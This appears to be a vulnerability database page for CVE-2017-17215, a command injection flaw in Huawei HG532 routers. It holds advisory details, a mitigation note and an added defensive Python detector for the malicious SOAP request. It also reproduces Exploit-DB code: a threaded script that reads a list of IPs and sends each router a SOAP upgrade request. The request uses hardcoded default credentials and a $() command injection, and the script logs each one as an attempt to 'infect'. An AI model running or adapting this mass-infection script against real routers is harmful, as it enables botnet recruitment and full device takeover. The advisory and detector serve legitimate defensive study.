Vendor: HG532
By: Ricardo J. Barberis
CVSS: 8.8 (HIGH)
Remote Code Execution
CWE: 78
Product Name: HG532
Affected Version From: V200R001C00B030SP05
Affected Version To: V200R001C01B030SP05
Patch Exists: YES
Related CWE: CVE-2017-17215
CPE: h:huawei:hg532
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2018

Huawei HG532 Router Remote Code Execution Vulnerability

A remote code execution vulnerability exists in Huawei HG532 routers. An unauthenticated attacker can send a specially crafted SOAP request to the router's DeviceUpgrade_1 service on port 37215 to execute arbitrary commands with root privileges. This vulnerability affects Huawei HG532 routers with firmware versions prior to V200R001C01B031SP05.

Mitigation:

Upgrade to Huawei HG532 firmware version V200R001C01B031SP05 or later.
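
A defensive check for the request this page describes, as an added example (not part of the original advisory or the Exploit-DB code): it inspects one captured HTTP request to /ctrlt/DeviceUpgrade_1 and flags shell metacharacters in the NewStatusURL and NewDownloadURL fields. The function names, the metacharacter list and the sample requests are assumptions constructed for illustration.

```python
import html
import re

# Path and field names come from this page; the metacharacter list is an assumption.
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"
FIELDS = ("NewStatusURL", "NewDownloadURL")
SHELL_META = re.compile(r"\$\(|\$\{|`|;|\||&&|[\r\n]")


def inspect_request(raw_request):
    """Return (field, value) pairs whose value carries shell metacharacters."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    if not request_line[1].split("?", 1)[0].endswith(UPGRADE_PATH):
        return []
    findings = []
    for field in FIELDS:
        pattern = r"<%s\b[^>]*>(.*?)</%s>" % (field, field)
        for match in re.finditer(pattern, body, re.S | re.I):
            # Decode XML entities first so "&#36;(" cannot hide "$(".
            value = html.unescape(match.group(1)).strip()
            if SHELL_META.search(value):
                findings.append((field, value))
    return findings


def sample_request(status_url, download_url):
    # Constructed sample request for the demo below; not captured traffic.
    return (
        "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
        "Host: 192.0.2.1:37215\r\n"
        "Content-Type: text/xml\r\n\r\n"
        '<?xml version="1.0" ?><s:Envelope><s:Body><u:Upgrade>'
        "<NewStatusURL>%s</NewStatusURL>"
        "<NewDownloadURL>%s</NewDownloadURL>"
        "</u:Upgrade></s:Body></s:Envelope>" % (status_url, download_url)
    )


BENIGN = sample_request("http://192.0.2.10/status", "http://192.0.2.10/fw.bin?a=1&amp;b=2")
SUSPICIOUS = sample_request("$(PLACEHOLDER)", "$(echo HUAWEIUPNP)")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_request(req))
```

The pattern list is a heuristic: a legitimate URL containing ";" or "|" would also be flagged, so treat hits as leads to review rather than verdicts.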

Exploit-DB raw data:

import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth
ips = open(sys.argv[1], "r").readlines()
cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

class exploit(threading.Thread):
		def __init__ (self, ip):
			threading.Thread.__init__(self)
			self.ip = str(ip).rstrip('\n')
		def run(self):
			try:
				url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
				requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
				print "[SOAP] Attempting to infect " + self.ip
			except Exception as e:
				pass

for ip in ips:
	try:
		n = exploit(ip)
		n.start()
		time.sleep(0.03)
	except:
		pass